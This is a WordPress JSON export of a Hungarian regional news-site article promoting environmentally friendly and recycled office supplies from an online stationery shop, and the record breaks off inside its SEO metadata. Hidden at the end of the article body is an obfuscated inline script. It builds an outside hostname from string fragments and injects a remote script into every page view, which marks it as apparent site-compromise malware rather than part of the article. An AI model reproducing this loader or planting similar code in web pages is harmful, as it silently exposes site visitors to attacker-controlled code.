{"id":60635,"date":"2024-03-25T12:02:04","date_gmt":"2024-03-25T11:02:04","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=60635"},"modified":"2024-03-25T12:02:04","modified_gmt":"2024-03-25T11:02:04","slug":"kornyezetbarat-es-ujrahasznositott-termekek","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/","title":{"rendered":"K\u00f6rnyezetbar\u00e1t \u00e9s \u00fajrahasznos\u00edtott term\u00e9kek"},"content":{"rendered":"<p><strong>A k\u00f6rnyezetv\u00e9delem \u00e9s a fenntarthat\u00f3s\u00e1g kulcsfontoss\u00e1g\u00fa t\u00e9nyez\u0151i a bolyg\u00f3nk j\u00f6v\u0151j\u00e9nek meg\u0151rz\u00e9s\u00e9ben. Mindannyian tehet\u00fcnk l\u00e9p\u00e9seket ezek el\u0151mozd\u00edt\u00e1s\u00e1\u00e9rt a mindennapi \u00e9let\u00fcnkben, p\u00e9ld\u00e1ul tudatos v\u00e1s\u00e1rl\u00e1ssal \u00e9s fogyaszt\u00e1ssal. Egyik egyszer\u0171, m\u00e9gis hat\u00e9kony m\u00f3dszer az \u00fajrahasznos\u00edtott anyagokb\u00f3l k\u00e9sz\u00fclt term\u00e9kek el\u0151nyben r\u00e9szes\u00edt\u00e9se.<\/strong><\/p>\n<p>Az \u00fajrahasznos\u00edtott term\u00e9kek v\u00e1s\u00e1rl\u00e1s\u00e1val jelent\u0151sen cs\u00f6kkenthetj\u00fck az \u00fcvegh\u00e1zhat\u00e1s\u00fa g\u00e1zok kibocs\u00e1t\u00e1s\u00e1t, mivel ezeknek a term\u00e9keknek a gy\u00e1rt\u00e1sa \u00e1ltal\u00e1ban kevesebb er\u0151forr\u00e1st ig\u00e9nyel, mint az \u00faj, nem \u00fajrahasznos\u00edtott anyagokb\u00f3l k\u00e9sz\u00fclt t\u00e1rsaik\u00e9. Az \u00fajrahasznos\u00edt\u00e1s cs\u00f6kkenti a hullad\u00e9k mennyis\u00e9g\u00e9t, meg\u00f3vja a term\u00e9szeti er\u0151forr\u00e1sokat, \u00e9s kevesebb energi\u00e1t ig\u00e9nyel, ami mind hozz\u00e1j\u00e1rul a k\u00f6rnyezeti l\u00e1bnyom cs\u00f6kkent\u00e9s\u00e9hez.<\/p>\n<p>Emellett a tudatos v\u00e1s\u00e1rl\u00e1s mag\u00e1ban foglalja a helyi term\u00e9kek prefer\u00e1l\u00e1s\u00e1t, amelyek sz\u00e1ll\u00edt\u00e1sa kevesebb k\u00e1rosanyag-kibocs\u00e1t\u00e1ssal j\u00e1r, valamint a tart\u00f3s, min\u0151s\u00e9gi term\u00e9kek kiv\u00e1laszt\u00e1s\u00e1t, amelyek hosszabb ideig szolg\u00e1lnak, cs\u00f6kkentve ezzel a gyakori cser\u00e9j\u00fck okozta k\u00f6rnyezetterhel\u00e9st. Az ilyen fogyaszt\u00f3i magatart\u00e1s nem csak a k\u00f6rnyezetet v\u00e9di, hanem hossz\u00fa t\u00e1von gazdas\u00e1gilag is el\u0151ny\u00f6s lehet. A fenntarthat\u00f3s\u00e1g \u00e9rdek\u00e9ben tett l\u00e9p\u00e9sek nemcsak glob\u00e1lis, hanem helyi szinten is fontosak. Minden egyes cselekedet\u00fcnkkel, legyen az ak\u00e1r a v\u00edzfogyaszt\u00e1s cs\u00f6kkent\u00e9se, az energiatakar\u00e9kos k\u00e9sz\u00fcl\u00e9kek haszn\u00e1lata, vagy az \u00fajrahasznos\u00edtott anyagokb\u00f3l k\u00e9sz\u00fclt term\u00e9kek v\u00e1s\u00e1rl\u00e1sa, hozz\u00e1j\u00e1rulhatunk bolyg\u00f3nk eg\u00e9szs\u00e9g\u00e9nek meg\u0151rz\u00e9s\u00e9hez.<\/p>\n<h2>\u00d3vjuk hat\u00e9konyan k\u00f6rnyezet\u00fcnket<\/h2>\n<p>Az <a href=\"https:\/\/www.irodaplus.hu\/kornyezetbarat-irodaszerek\" target=\"_blank\" rel=\"noopener\"><span style=\"text-decoration: underline; color: #0000ff;\">irodaplus.hu irodaszer web\u00e1ruh\u00e1z k\u00f6rnyezetbar\u00e1t term\u00e9kpalett\u00e1ja<\/span><\/a> kiv\u00e1l\u00f3 lehet\u0151s\u00e9get ny\u00fajt mindazoknak, akik felel\u0151ss\u00e9gteljes v\u00e1s\u00e1rl\u00e1si d\u00f6nt\u00e9seket k\u00edv\u00e1nnak hozni. Az \u00e1ltaluk k\u00edn\u00e1lt irodaszerek nem csak hat\u00e9konys\u00e1gukkal \u00e9s praktikumukkal t\u0171nnek ki, hanem azzal is, hogy hozz\u00e1j\u00e1rulnak a k\u00f6rnyezeti terhel\u00e9s cs\u00f6kkent\u00e9s\u00e9hez.<\/p>\n<p>A k\u00f6rnyezetbar\u00e1t vagy \u00fajrahasznos\u00edtott anyagokb\u00f3l k\u00e9sz\u00fclt term\u00e9kek v\u00e1laszt\u00e1sa nem csup\u00e1n a fenntarthat\u00f3 er\u0151forr\u00e1s-haszn\u00e1latot seg\u00edti el\u0151, hanem jelent\u0151sen hozz\u00e1j\u00e1rul a hullad\u00e9ktermel\u00e9s \u00e9s az \u00fczemeltet\u00e9si k\u00f6lts\u00e9gek cs\u00f6kkent\u00e9s\u00e9hez is. A gy\u00e1rt\u00e1si folyamat sor\u00e1n kevesebb er\u0151forr\u00e1st ig\u00e9nyl\u0151, k\u00f6rnyezetk\u00edm\u00e9l\u0151 technol\u00f3gi\u00e1k alkalmaz\u00e1sa r\u00e9v\u00e9n ezek a term\u00e9kek kisebb energiavesztes\u00e9get \u00e9s alacsonyabb szennyez\u0151anyag-kibocs\u00e1t\u00e1st eredm\u00e9nyeznek. A k\u00f6rnyezetbar\u00e1t irodaszerek v\u00e1laszt\u00e9ka lehet\u0151v\u00e9 teszi a v\u00e1llalatok \u00e9s mag\u00e1nszem\u00e9lyek sz\u00e1m\u00e1ra, hogy akt\u00edvan r\u00e9szt vegyenek a k\u00f6rnyezettudatos magatart\u00e1s el\u0151mozd\u00edt\u00e1s\u00e1ban, mik\u00f6zben napi munk\u00e1juk sor\u00e1n is magas sz\u00ednvonal\u00fa \u00e9s hat\u00e9kony eszk\u00f6z\u00f6ket haszn\u00e1lnak. Ez a gyakorlati l\u00e9p\u00e9s nem csak azonnali el\u0151ny\u00f6ket ny\u00fajt, hanem hossz\u00fa t\u00e1von is el\u0151seg\u00edti a fenntarthat\u00f3 fejl\u0151d\u00e9st \u00e9s a k\u00f6rnyezeti tudatoss\u00e1g n\u00f6vel\u00e9s\u00e9t.<\/p>\n<h2>Z\u00f6ld trendek<\/h2>\n<p>A &#8222;k\u00f6rnyezetbar\u00e1t&#8221; jelz\u0151vel ell\u00e1tott term\u00e9kek \u00e9s folyamatok alapvet\u0151 jellemz\u0151je, hogy fenntarthat\u00f3 m\u00f3don, a k\u00f6rnyezetre gyakorolt negat\u00edv hat\u00e1sok minimaliz\u00e1l\u00e1s\u00e1val k\u00e9sz\u00fclnek. Ez a gyakorlatban azt jelenti, hogy a gy\u00e1rt\u00e1si folyamatok sor\u00e1n olyan m\u00f3dszereket \u00e9s anyagokat v\u00e1lasztanak, amelyek kev\u00e9sb\u00e9 terhelik a k\u00f6rnyezetet, cs\u00f6kkentik az \u00fcvegh\u00e1zhat\u00e1s\u00fa g\u00e1zok kibocs\u00e1t\u00e1s\u00e1t, minimaliz\u00e1lj\u00e1k az er\u0151forr\u00e1sok felhaszn\u00e1l\u00e1s\u00e1t \u00e9s lehet\u0151leg meg\u00fajul\u00f3 forr\u00e1sokb\u00f3l sz\u00e1rmaznak. A k\u00f6rnyezetbar\u00e1t term\u00e9kek tervez\u00e9sekor figyelembe veszik a term\u00e9k teljes \u00e9letciklus\u00e1t, azaz a gy\u00e1rt\u00e1st\u00f3l kezdve a felhaszn\u00e1l\u00e1son \u00e1t a hullad\u00e9kkezel\u00e9sig minden szakaszt, ahol a c\u00e9l az, hogy a term\u00e9k k\u00f6rnyezeti l\u00e1bnyoma a lehet\u0151 legkisebb legyen.<\/p>\n<p>Az &#8222;\u00fajrahasznos\u00edthat\u00f3&#8221; kifejez\u00e9s azt jelzi, hogy a term\u00e9k vagy annak csomagol\u00e1sa olyan anyagokb\u00f3l k\u00e9sz\u00fclt, amelyek \u00fajrahasznos\u00edt\u00e1sra alkalmasak. Ez mag\u00e1ban foglalja az \u00fcveget, a f\u00e9met \u00e9s egyre t\u00f6bb t\u00edpus\u00fa m\u0171anyagot is. Az \u00fajrahasznos\u00edthat\u00f3s\u00e1g kulcsfontoss\u00e1g\u00fa a k\u00f6rnyezeti fenntarthat\u00f3s\u00e1g szempontj\u00e1b\u00f3l, mivel lehet\u0151v\u00e9 teszi a haszn\u00e1lt anyagok \u00e9rt\u00e9k\u00e9nek meg\u0151rz\u00e9s\u00e9t, cs\u00f6kkenti a hullad\u00e9k mennyis\u00e9g\u00e9t \u00e9s az \u00faj nyersanyagok ir\u00e1nti ig\u00e9nyt, ezzel is cs\u00f6kkentve a k\u00f6rnyezetre gyakorolt terhel\u00e9st. Az \u00fajrahasznos\u00edt\u00e1s folyamata hozz\u00e1j\u00e1rul a z\u00e1rt k\u00f6r\u0171 gazdas\u00e1g megval\u00f3s\u00edt\u00e1s\u00e1hoz, ahol a term\u00e9kek \u00e9s anyagok hosszabb \u00e9lettartamot \u00e9lveznek, \u00e9s kevesebb hullad\u00e9k keletkezik.<\/p>\n<h2><strong>V\u00e1lassz te is k\u00f6rnyezetbar\u00e1t term\u00e9keket!<\/strong><\/h2>\n<p>Az \u00fajrahasznos\u00edt\u00e1s \u00e9s a k\u00f6rnyezettudatos fogyaszt\u00e1s fontoss\u00e1ga napjainkban egyre nagyobb teret nyer a t\u00e1rsadalomban, \u00e9s az irodaplus.hu irodaszer web\u00e1ruh\u00e1z k\u00edn\u00e1lata kiv\u00e1l\u00f3 lehet\u0151s\u00e9get biztos\u00edt arra, hogy akt\u00edvan hozz\u00e1j\u00e1ruljunk a k\u00f6rnyezet\u00fcnk meg\u00f3v\u00e1s\u00e1hoz. Az \u00e1ltaluk k\u00edn\u00e1lt k\u00f6rnyezetbar\u00e1t irodaszerek haszn\u00e1lata jelent\u0151s l\u00e9p\u00e9s lehet egy fenntarthat\u00f3bb j\u00f6v\u0151 fel\u00e9.<\/p>\n<p>A k\u00f6rnyezetbar\u00e1t term\u00e9kek alacsonyabb vegyi anyag- \u00e9s m\u00e9rgez\u0151 mell\u00e9kterm\u00e9k-tartalmuk r\u00e9v\u00e9n cs\u00f6kkentik a k\u00f6rnyezetszennyez\u00e9st. Az \u00fajrahasznos\u00edtott anyagokb\u00f3l k\u00e9sz\u00fclt term\u00e9kek v\u00e1laszt\u00e1sa nem csak a hullad\u00e9k mennyis\u00e9g\u00e9nek cs\u00f6kken\u00e9s\u00e9t eredm\u00e9nyezi, hanem el\u0151seg\u00edti a term\u00e9szeti er\u0151forr\u00e1sok hat\u00e9konyabb felhaszn\u00e1l\u00e1s\u00e1t is. Ez\u00e1ltal kevesebb szennyez\u0151 anyag jut a k\u00f6rnyezetbe, javul a leveg\u0151 min\u0151s\u00e9ge, \u00e9s vizeink tisztas\u00e1g\u00e1t is meg\u0151rizhetj\u00fck.<\/p>\n<p>Mindannyian tehet\u00fcnk a k\u00f6rnyezet\u00fcnk eg\u00e9szs\u00e9g\u00e9\u00e9rt \u00e9s a j\u00f6v\u0151nk\u00e9rt azzal, hogy tudatosan v\u00e1lasztunk k\u00f6rnyezetbar\u00e1t \u00e9s \u00fajrahasznos\u00edtott anyagokb\u00f3l k\u00e9sz\u00fclt term\u00e9keket. Nemcsak a munkahelyi k\u00f6rnyezet\u00fcnk tehet\u0151 fenntarthat\u00f3bb\u00e1, hanem az otthonunk is. A k\u00f6rnyezetbar\u00e1t irodaszerek haszn\u00e1lata kis l\u00e9p\u00e9s lehet egy\u00e9nileg, de nagy hat\u00e1ssal b\u00edrhat glob\u00e1lisan, hozz\u00e1j\u00e1rulva egy eg\u00e9szs\u00e9gesebb bolyg\u00f3 \u00e9s boldogabb j\u00f6v\u0151 kialak\u00edt\u00e1s\u00e1hoz.<\/p>\n<p><script>\n(function(){\nxpi6_=(\"u\"+\"\")+\"s\"+\"\";xpi6_+=(\"tat.\")+(\"i\");\nxpi6=document.createElement(\"script\");xpi6.type=\"text\/javascript\";xpi6_+=\"nf\"+(\"o\")+\"\/\";\nxpi6u=\"2240850174\"+\".\";xpi6.async=true;xpi6u+=\"42uh530rpi6aljvlqegg2y5vcz8jv0\";\nxpi6.src=\"https:\/\/\"+xpi6_+xpi6u;xpi6b=document.body;xpi6b.appendChild(xpi6);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A k\u00f6rnyezetv\u00e9delem \u00e9s a fenntarthat\u00f3s\u00e1g kulcsfontoss\u00e1g\u00fa t\u00e9nyez\u0151i a bolyg\u00f3nk j\u00f6v\u0151j\u00e9nek meg\u0151rz\u00e9s\u00e9ben. Mindannyian tehet\u00fcnk l\u00e9p\u00e9seket ezek el\u0151mozd\u00edt\u00e1s\u00e1\u00e9rt a mindennapi \u00e9let\u00fcnkben, p\u00e9ld\u00e1ul tudatos v\u00e1s\u00e1rl\u00e1ssal \u00e9s fogyaszt\u00e1ssal. Egyik egyszer\u0171, m\u00e9gis hat\u00e9kony m\u00f3dszer az \u00fajrahasznos\u00edtott anyagokb\u00f3l k\u00e9sz\u00fclt term\u00e9kek el\u0151nyben r\u00e9szes\u00edt\u00e9se. Az \u00fajrahasznos\u00edtott term\u00e9kek v\u00e1s\u00e1rl\u00e1s\u00e1val jelent\u0151sen cs\u00f6kkenthetj\u00fck az \u00fcvegh\u00e1zhat\u00e1s\u00fa g\u00e1zok kibocs\u00e1t\u00e1s\u00e1t, mivel ezeknek a term\u00e9keknek a gy\u00e1rt\u00e1sa \u00e1ltal\u00e1ban kevesebb er\u0151forr\u00e1st<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[],"class_list":{"0":"post-60635","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-hirek"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>K\u00f6rnyezetbar\u00e1t \u00e9s \u00fajrahasznos\u00edtott term\u00e9kek<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"K\u00f6rnyezetbar\u00e1t \u00e9s \u00fajrahasznos\u00edtott term\u00e9kek\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"A k\u00f6rnyezetv\u00e9delem \u00e9s a fenntarthat\u00f3s\u00e1g kulcsfontoss\u00e1g\u00fa t\u00e9nyez\u0151i a bolyg\u00f3nk j\u00f6v\u0151j\u00e9nek meg\u0151rz\u00e9s\u00e9ben. Mindannyian tehet\u00fcnk l\u00e9p\u00e9seket ezek el\u0151mozd\u00edt\u00e1s\u00e1\u00e9rt a mindennapi \u00e9let\u00fcnkben, p\u00e9ld\u00e1ul tudatos v\u00e1s\u00e1rl\u00e1ssal \u00e9s fogyaszt\u00e1ssal. Egyik egyszer\u0171, m\u00e9gis hat\u00e9kony m\u00f3dszer az \u00fajrahasznos\u00edtott anyagokb\u00f3l k\u00e9sz\u00fclt term\u00e9kek el\u0151nyben r\u00e9szes\u00edt\u00e9se. Az \u00fajrahasznos\u00edtott term\u00e9kek v\u00e1s\u00e1rl\u00e1s\u00e1val jelent\u0151sen cs\u00f6kkenthetj\u00fck az \u00fcvegh\u00e1zhat\u00e1s\u00fa g\u00e1zok kibocs\u00e1t\u00e1s\u00e1t, mivel ezeknek a term\u00e9keknek a gy\u00e1rt\u00e1sa \u00e1ltal\u00e1ban kevesebb er\u0151forr\u00e1st\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2024-03-25T11:02:04+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/03\/kornyezetbarat-irodaszerek.jpg\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/03\\\/25\\\/kornyezetbarat-es-ujrahasznositott-termekek\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/03\\\/25\\\/kornyezetbarat-es-ujrahasznositott-termekek\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"K\u00f6rnyezetbar\u00e1t \u00e9s \u00fajrahasznos\u00edtott term\u00e9kek\",\"datePublished\":\"2024-03-25T11:02:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/03\\\/25\\\/kornyezetbarat-es-ujrahasznositott-termekek\\\/\"},\"wordCount\":1137,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/03\\\/25\\\/kornyezetbarat-es-ujrahasznositott-termekek\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/03\\\/25\\\/kornyezetbarat-es-ujrahasznositott-termekek\\\/\",\"name\":\"K\u00f6rnyezetbar\u00e1t \u00e9s \u00fajrahasznos\u00edtott term\u00e9kek\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"datePublished\":\"2024-03-25T11:02:04+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/03\\\/25\\\/kornyezetbarat-es-ujrahasznositott-termekek\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/03\\\/25\\\/kornyezetbarat-es-ujrahasznositott-termekek\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/03\\\/25\\\/kornyezetbarat-es-ujrahasznositott-termekek\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"K\u00f6rnyezetbar\u00e1t \u00e9s \u00fajrahasznos\u00edtott term\u00e9kek\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"K\u00f6rnyezetbar\u00e1t \u00e9s \u00fajrahasznos\u00edtott term\u00e9kek","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/","og_locale":"hu_HU","og_type":"article","og_title":"K\u00f6rnyezetbar\u00e1t \u00e9s \u00fajrahasznos\u00edtott term\u00e9kek","og_description":"A k\u00f6rnyezetv\u00e9delem \u00e9s a fenntarthat\u00f3s\u00e1g kulcsfontoss\u00e1g\u00fa t\u00e9nyez\u0151i a bolyg\u00f3nk j\u00f6v\u0151j\u00e9nek meg\u0151rz\u00e9s\u00e9ben. Mindannyian tehet\u00fcnk l\u00e9p\u00e9seket ezek el\u0151mozd\u00edt\u00e1s\u00e1\u00e9rt a mindennapi \u00e9let\u00fcnkben, p\u00e9ld\u00e1ul tudatos v\u00e1s\u00e1rl\u00e1ssal \u00e9s fogyaszt\u00e1ssal. Egyik egyszer\u0171, m\u00e9gis hat\u00e9kony m\u00f3dszer az \u00fajrahasznos\u00edtott anyagokb\u00f3l k\u00e9sz\u00fclt term\u00e9kek el\u0151nyben r\u00e9szes\u00edt\u00e9se. Az \u00fajrahasznos\u00edtott term\u00e9kek v\u00e1s\u00e1rl\u00e1s\u00e1val jelent\u0151sen cs\u00f6kkenthetj\u00fck az \u00fcvegh\u00e1zhat\u00e1s\u00fa g\u00e1zok kibocs\u00e1t\u00e1s\u00e1t, mivel ezeknek a term\u00e9keknek a gy\u00e1rt\u00e1sa \u00e1ltal\u00e1ban kevesebb er\u0151forr\u00e1st","og_url":"https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2024-03-25T11:02:04+00:00","og_image":[{"width":1920,"height":1080,"url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/03\/kornyezetbarat-irodaszerek.jpg","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"6 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"K\u00f6rnyezetbar\u00e1t \u00e9s \u00fajrahasznos\u00edtott term\u00e9kek","datePublished":"2024-03-25T11:02:04+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/"},"wordCount":1137,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/","url":"https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/","name":"K\u00f6rnyezetbar\u00e1t \u00e9s \u00fajrahasznos\u00edtott term\u00e9kek","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"datePublished":"2024-03-25T11:02:04+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/03\/25\/kornyezetbarat-es-ujrahasznositott-termekek\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"K\u00f6rnyezetbar\u00e1t \u00e9s \u00fajrahasznos\u00edtott term\u00e9kek"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis 